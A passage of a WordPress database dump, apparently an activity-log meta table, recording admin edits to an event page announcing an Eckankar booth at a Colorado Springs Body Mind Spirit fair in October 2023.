Here'),(215924,35606,'_message_key','post_updated'),(215925,35606,'_user_id','2'),(215926,35606,'_user_login','S8zhaBda'),(215927,35606,'_user_email','nada@zipnadanot.org'),(215928,35606,'_server_remote_addr','76.130.120.x'),(215929,35606,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(215930,35607,'new_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(215931,35607,'new_post_id','269140'),(215932,35607,'duplicated_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(215933,35607,'duplicated_post_id','267696'),(215934,35607,'_message_key','post_duplicated'),(215935,35607,'_user_id','2'),(215936,35607,'_user_login','S8zhaBda'),(215937,35607,'_user_email','nada@zipnadanot.org'),(215938,35607,'_server_remote_addr','76.130.120.x'),(215939,35607,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(215940,35608,'post_type','attachment'),(215941,35608,'attachment_id','269141'),(215942,35608,'attachment_title','2023-body-mind-spirit-expo'),(215943,35608,'attachment_filename','2023-body-mind-spirit-expo.jpg'),(215944,35608,'attachment_mime','image/jpeg'),(215945,35608,'attachment_filesize','162217'),(215946,35608,'attachment_parent_id','269140'),(215947,35608,'attachment_parent_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(215948,35608,'attachment_parent_post_type','mec-events'),(215949,35608,'_message_key','attachment_created'),(215950,35608,'_user_id','2'),(215951,35608,'_user_login','S8zhaBda'),(215952,35608,'_user_email','nada@zipnadanot.org'),(215953,35608,'_server_remote_addr','76.130.120.x'),(215954,35608,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(215955,35609,'post_id','269140'),(215956,35609,'post_type','mec-events'),(215957,35609,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(215958,35609,'post_meta_added','78'),(215959,35609,'_message_key','post_updated'),(215960,35609,'_user_id','2'),(215961,35609,'_user_login','S8zhaBda'),(215962,35609,'_user_email','nada@zipnadanot.org'),(215963,35609,'_server_remote_addr','76.130.120.x'),(215964,35609,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(215965,35610,'post_id','269140'),(215966,35610,'post_type','mec-events'),(215967,35610,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(215968,35610,'post_meta_added','78'),(215969,35610,'_message_key','post_updated'),(215970,35610,'_user_id','2'),(215971,35610,'_user_login','S8zhaBda'),(215972,35610,'_user_email','nada@zipnadanot.org'),(215973,35610,'_server_remote_addr','76.130.120.x'),(215974,35610,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(215975,35611,'post_id','269140'),(215976,35611,'post_type','mec-events'),(215977,35611,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(215978,35611,'post_meta_added','78'),(215979,35611,'_message_key','post_updated'),(215980,35611,'_user_id','2'),(215981,35611,'_user_login','S8zhaBda'),(215982,35611,'_user_email','nada@zipnadanot.org'),(215983,35611,'_server_remote_addr','76.130.120.x'),(215984,35611,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(215985,35612,'post_id','269140'),(215986,35612,'post_type','mec-events'),(215987,35612,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(215988,35612,'post_meta_added','78'),(215989,35612,'_message_key','post_updated'),(215990,35612,'_user_id','2'),(215991,35612,'_user_login','S8zhaBda'),(215992,35612,'_user_email','nada@zipnadanot.org'),(215993,35612,'_server_remote_addr','76.130.120.x'),(215994,35612,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(215995,35613,'post_id','269140'),(215996,35613,'post_type','mec-events'),(215997,35613,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(215998,35613,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Come see us if you would like to learn more about Eckankar.<br>\n</span></strong></p>\n<span style=\"font-size: 14pt;\">We will host a booth at the Body Mind Spirit Fair</span><br>\n<span style=\"font-size: 14pt;\">Fri.- Sun., Oct. 6-8</span><br>\n<span style=\"font-size: 14pt;\">at the Colorado Springs Event Center </span><br>\n<span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span><br>\n<span style=\"font-size: 14pt;\">CS, CO 80918</span><br>\n<br>\n<span class=\"\" style=\"font-size: 14pt;\">Please feel free to drop by for some free literature or to talk with other ECKists.</span> <br>\n<br>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(215999,35613,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Come see us if you would like to learn more about Eckankar.<br>\r\n</span></strong></p>\r\n<span style=\"font-size: 14pt;\">We will host a booth at the Body Mind Spirit Fair</span><br>\r\n<span style=\"font-size: 14pt;\">Fri.- Sun., Oct. 6-8</span><br>\r\n<span style=\"font-size: 14pt;\">at the Colorado Springs Event Center </span><br>\r\n<span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span><br>\r\n<span style=\"font-size: 14pt;\">CS, CO 80918</span><br>\r\n<br>\r\n<span class=\"\" style=\"font-size: 14pt;\">Please feel free to drop by for some free literature or to talk with other ECKists.</span> <br>\r\n<br>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216000,35613,'post_prev_post_date','2023-10-02 13:22:31'),(216001,35613,'post_new_post_date','2023-10-02 13:24:52'),(216002,35613,'post_new_thumb_id','269141'),(216003,35613,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216004,35613,'_message_key','post_updated'),(216005,35613,'_user_id','2'),(216006,35613,'_user_login','S8zhaBda'),(216007,35613,'_user_email','nada@zipnadanot.org'),(216008,35613,'_server_remote_addr','76.130.120.x'),(216009,35613,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269140'),(216010,35614,'term_id','201'),(216011,35614,'term_name','Spiritual Fair Booth'),(216012,35614,'term_taxonomy','mec_label'),(216013,35614,'_message_key','created_term'),(216014,35614,'_user_id','2'),(216015,35614,'_user_login','S8zhaBda'),(216016,35614,'_user_email','nada@zipnadanot.org'),(216017,35614,'_server_remote_addr','76.130.120.x'),(216018,35614,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit-tags.php?taxonomy=mec_label&post_type=mec-events'),(216019,35615,'post_id','269140'),(216020,35615,'post_type','mec-events'),(216021,35615,'post_title','Body Mind Spirit Fair &#8211; ECK Booth'),(216022,35615,'post_new_thumb_id','269141'),(216023,35615,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216024,35615,'post_meta_added','78'),(216025,35615,'_message_key','post_updated'),(216026,35615,'_user_id','2'),(216027,35615,'_user_login','S8zhaBda'),(216028,35615,'_user_email','nada@zipnadanot.org'),(216029,35615,'_server_remote_addr','76.130.120.x'),(216030,35615,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216031,35616,'post_id','269140'),(216032,35616,'post_type','mec-events'),(216033,35616,'post_title','ECKANKAR BOOTH at Body Mind Spirit Fair'),(216034,35616,'post_new_thumb_id','269141'),(216035,35616,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216036,35616,'post_meta_added','78'),(216037,35616,'_message_key','post_updated'),(216038,35616,'_user_id','2'),(216039,35616,'_user_login','S8zhaBda'),(216040,35616,'_user_email','nada@zipnadanot.org'),(216041,35616,'_server_remote_addr','76.130.120.x'),(216042,35616,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216043,35617,'post_id','269140'),(216044,35617,'post_type','mec-events'),(216045,35617,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216046,35617,'post_new_thumb_id','269141'),(216047,35617,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216048,35617,'post_meta_added','78'),(216049,35617,'_message_key','post_updated'),(216050,35617,'_user_id','2'),(216051,35617,'_user_login','S8zhaBda'),(216052,35617,'_user_email','nada@zipnadanot.org'),(216053,35617,'_server_remote_addr','76.130.120.x'),(216054,35617,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216055,35618,'post_id','269140'),(216056,35618,'post_type','mec-events'),(216057,35618,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216058,35618,'post_new_thumb_id','269141'),(216059,35618,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216060,35618,'post_meta_added','78'),(216061,35618,'_message_key','post_updated'),(216062,35618,'_user_id','2'),(216063,35618,'_user_login','S8zhaBda'),(216064,35618,'_user_email','nada@zipnadanot.org'),(216065,35618,'_server_remote_addr','76.130.120.x'),(216066,35618,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216067,35619,'post_id','269140'),(216068,35619,'post_type','mec-events'),(216069,35619,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216070,35619,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Come see us to learn more about Eckankar.<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">We are very excited to announce that Colorado Springs Eckankar will have a booth at this year’s Body, Mind, Spirit Celebration!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\n</div>\n</div>\n</div>\n</div>'),(216071,35619,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Come see us to learn more about Eckankar!<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We are very excited to announce that Colorado Springs Eckankar will have a booth at this year’s Body, Mind, Spirit Celebration!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216072,35619,'post_prev_post_date','2023-10-02 13:32:15'),(216073,35619,'post_new_post_date','2023-10-02 13:32:45'),(216074,35619,'_message_key','post_updated'),(216075,35619,'_user_id','2'),(216076,35619,'_user_login','S8zhaBda'),(216077,35619,'_user_email','nada@zipnadanot.org'),(216078,35619,'_server_remote_addr','76.130.120.x'),(216079,35619,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216080,35620,'post_id','269140'),(216081,35620,'post_type','mec-events'),(216082,35620,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216083,35620,'post_new_thumb_id','269141'),(216084,35620,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216085,35620,'post_meta_added','78'),(216086,35620,'_message_key','post_updated'),(216087,35620,'_user_id','2'),(216088,35620,'_user_login','S8zhaBda'),(216089,35620,'_user_email','nada@zipnadanot.org'),(216090,35620,'_server_remote_addr','76.130.120.x'),(216091,35620,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216092,35621,'post_id','269140'),(216093,35621,'post_type','mec-events'),(216094,35621,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216095,35621,'post_prev_post_name',''),(216096,35621,'post_new_post_name','eckankar-booth-at-body-mind-spirit-celebration'),(216097,35621,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.!<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">We are very excited to announce that Colorado Springs Eckankar will have a booth at this year’s Body, Mind, Spirit Celebration!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\n</div>\n</div>\n</div>\n</div>'),(216098,35621,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216099,35621,'post_prev_post_status','draft'),(216100,35621,'post_new_post_status','publish'),(216101,35621,'post_prev_post_date','2023-10-02 13:35:18'),(216102,35621,'post_new_post_date','2023-10-02 13:36:02'),(216103,35621,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216104,35621,'post_new_post_date_gmt','2023-10-02 19:36:02'),(216105,35621,'_message_key','post_updated'),(216106,35621,'_user_id','2'),(216107,35621,'_user_login','S8zhaBda'),(216108,35621,'_user_email','nada@zipnadanot.org'),(216109,35621,'_server_remote_addr','76.130.120.x'),(216110,35621,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216111,35622,'post_id','269140'),(216112,35622,'post_type','mec-events'),(216113,35622,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216114,35622,'_message_key','post_updated'),(216115,35622,'_user_id','2'),(216116,35622,'_user_login','S8zhaBda'),(216117,35622,'_user_email','nada@zipnadanot.org'),(216118,35622,'_server_remote_addr','76.130.120.x'),(216119,35622,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216120,35623,'post_id','269140'),(216121,35623,'post_type','mec-events'),(216122,35623,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216123,35623,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216124,35623,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span><br>\r\n<span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span><br>\r\n<span style=\"font-size: 14pt;\">Colorado Springs, CO</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216125,35623,'_message_key','post_updated'),(216126,35623,'_user_id','2'),(216127,35623,'_user_login','S8zhaBda'),(216128,35623,'_user_email','nada@zipnadanot.org'),(216129,35623,'_server_remote_addr','76.130.120.x'),(216130,35623,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216131,35624,'post_id','269140'),(216132,35624,'post_type','mec-events'),(216133,35624,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216134,35624,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span><br>\r\n<span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span><br>\r\n<span style=\"font-size: 14pt;\">Colorado Springs, CO</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216135,35624,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8<br>\r\n</span><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Colorado Springs, CO</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216136,35624,'_message_key','post_updated'),(216137,35624,'_user_id','2'),(216138,35624,'_user_login','S8zhaBda'),(216139,35624,'_user_email','nada@zipnadanot.org'),(216140,35624,'_server_remote_addr','76.130.120.x'),(216141,35624,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216142,35625,'term_id','201'),(216143,35625,'from_term_name','Spiritual Fair Booth'),(216144,35625,'from_term_taxonomy','mec_label'),(216145,35625,'from_term_slug','spiritual-fair-booth'),(216146,35625,'from_term_description',''),(216147,35625,'to_term_name','Spiritual Fair Booth'),(216148,35625,'to_term_taxonomy','mec_label'),(216149,35625,'to_term_slug','spiritual-fair-booth'),(216150,35625,'to_term_description',''),(216151,35625,'_message_key','edited_term'),(216152,35625,'_user_id','2'),(216153,35625,'_user_login','S8zhaBda'),(216154,35625,'_user_email','nada@zipnadanot.org'),(216155,35625,'_server_remote_addr','76.130.120.x'),(216156,35625,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=201&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(216157,35626,'post_id','269140'),(216158,35626,'post_type','mec-events'),(216159,35626,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216160,35626,'_message_key','post_updated'),(216161,35626,'_user_id','2'),(216162,35626,'_user_login','S8zhaBda'),(216163,35626,'_user_email','nada@zipnadanot.org'),(216164,35626,'_server_remote_addr','76.130.120.x'),(216165,35626,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216166,35627,'post_id','269140'),(216167,35627,'post_type','mec-events'),(216168,35627,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216169,35627,'_message_key','post_updated'),(216170,35627,'_user_id','2'),(216171,35627,'_user_login','S8zhaBda'),(216172,35627,'_user_email','nada@zipnadanot.org'),(216173,35627,'_server_remote_addr','76.130.120.x'),(216174,35627,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216175,35628,'term_id','201'),(216176,35628,'from_term_name','Spiritual Fair Booth'),(216177,35628,'from_term_taxonomy','mec_label'),(216178,35628,'from_term_slug','spiritual-fair-booth'),(216179,35628,'from_term_description',''),(216180,35628,'to_term_name','Spiritual Fair Booth'),(216181,35628,'to_term_taxonomy','mec_label'),(216182,35628,'to_term_slug','spiritual-fair-booth'),(216183,35628,'to_term_description',''),(216184,35628,'_message_key','edited_term'),(216185,35628,'_user_id','2'),(216186,35628,'_user_login','S8zhaBda'),(216187,35628,'_user_email','nada@zipnadanot.org'),(216188,35628,'_server_remote_addr','76.130.120.x'),(216189,35628,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=201&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(216190,35629,'term_id','201'),(216191,35629,'from_term_name','Spiritual Fair Booth'),(216192,35629,'from_term_taxonomy','mec_label'),(216193,35629,'from_term_slug','spiritual-fair-booth'),(216194,35629,'from_term_description',''),(216195,35629,'to_term_name','Spiritual Fair Booth'),(216196,35629,'to_term_taxonomy','mec_label'),(216197,35629,'to_term_slug','spiritual-fair-booth'),(216198,35629,'to_term_description',''),(216199,35629,'_message_key','edited_term'),(216200,35629,'_user_id','2'),(216201,35629,'_user_login','S8zhaBda'),(216202,35629,'_user_email','nada@zipnadanot.org'),(216203,35629,'_server_remote_addr','76.130.120.x'),(216204,35629,'_server_http_referer','https://eckankar-colorado.org/wp-admin/term.php?taxonomy=mec_label&tag_ID=201&post_type=mec-events&wp_http_referer=%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dmec_label%26post_type%3Dmec-events'),(216205,35630,'post_id','269140'),(216206,35630,'post_type','mec-events'),(216207,35630,'post_title','ECKANKAR BOOTH at Body Mind Spirit 